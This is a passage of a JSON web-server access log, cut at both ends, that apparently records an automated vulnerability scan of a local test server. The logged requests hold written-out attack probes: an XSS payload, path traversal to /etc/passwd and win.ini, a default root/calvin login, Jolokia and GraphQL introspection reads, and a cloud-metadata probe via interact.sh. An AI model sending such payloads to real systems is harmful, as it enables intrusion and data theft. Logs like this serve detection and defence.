/control/stream?contentId=%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.339","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /AvalancheWeb/image?imageFilePath=C:/windows/win.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.392","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/java.lang:type=Memory HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.340","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:31 +0000","request_body":"","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.359","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/90 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.327","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:31 +0000","request_body":"user=root&password=calvin","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /data/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.173","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:31 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.329","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /..;/examples/servlets/index.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.436","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:31 +0000","request_body":"","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.282","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jolokia/read/java.lang:type=Memory HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.321","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/91 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.325","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.044","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /..;/examples/jsp/index.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.431","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.431","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /update.sh HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.144","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /..;/examples/websocket/index.xhtml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.323","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/errors.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.073","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.xz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.401","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/92 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.713","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.387","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /config.sh HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.383","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:32 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.090","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1/error.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.321","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.zip HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.387","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/93 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.383","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /build.sh HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.338","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:32 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.min.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.390","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1/errors.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.385","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/94 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.285","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /setup.sh HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.286","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.324","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /MyErrors.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.327","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/95 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.304","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /run.sh HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.300","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/latest/meta-data/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"7.016","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.tar.z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.380","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /log.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.379","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /backup.sh HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.374","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/96 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.434","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.db HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.381","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.537","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /compile.sh HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.326","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/97 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.326","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sqlite HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.326","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.323","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:34 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.min.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.483","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /logs.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.763","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sqlitedb HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.327","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/98 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.435","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.331","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:34 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.331","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.7z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.284","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /log.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.347","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /env.sh HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.822","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/99 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.432","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.428","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.bz2 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.300","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:35 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v4/graphiql/finland HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.435","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /application/logs/application.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.416","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /init.sh HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.326","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/100 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.324","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.325","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.gz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.280","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, 